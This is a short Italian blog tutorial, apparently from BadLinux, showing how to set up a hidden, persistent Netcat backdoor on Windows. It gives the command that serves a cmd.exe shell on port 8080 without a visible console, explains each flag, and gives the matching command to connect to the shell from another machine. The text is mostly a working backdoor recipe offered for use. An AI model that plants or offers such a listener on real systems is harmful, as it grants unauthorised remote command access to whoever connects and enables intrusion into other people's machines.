Una delle backdoor di controllo remoto più facili da impostare è Netcat.
https://it.wikipedia.org/wiki/Netcat
Netcat può essere configurato in modo da ascoltare su una certa porta e avviare un eseguibile quando un sistema remoto si connette.
Impostando un listener netcat in modo che avvii una shell di comandi Windows, è possibile che questa shell compaia su un sistema remoto.
La sintassi per avviare netcat in una modalità di ascolto nascosta è la seguente:
nc -L -d -e cmd.exe -p 8080
L’opzione -L rende il listener persistente tra più interruzioni della connessione;
-d attiva l’esecuzione di netcat in maniera nascosta (senza console interattiva);
-e specifica il programma da avviare (in questo caso cmd.exe).
Infine, -p specifica la porta su cui mettersi in ascolto.
Il comando retribuisce una shell di comandi remota a chiunque si connetta alla porta 8080.
Per connetterci da un altro sistema il comando da digitare è il seguente:
nc 192.168.202.44 8080
Dove in questo caso 192.168.202.44 è l’indirizzo ip a cui ci connettiamo e 8080 la porta
Fonti: Hacker 7.0 Apogeo
L’articolo Backdoor con Netcat Windows proviene da BadLinux.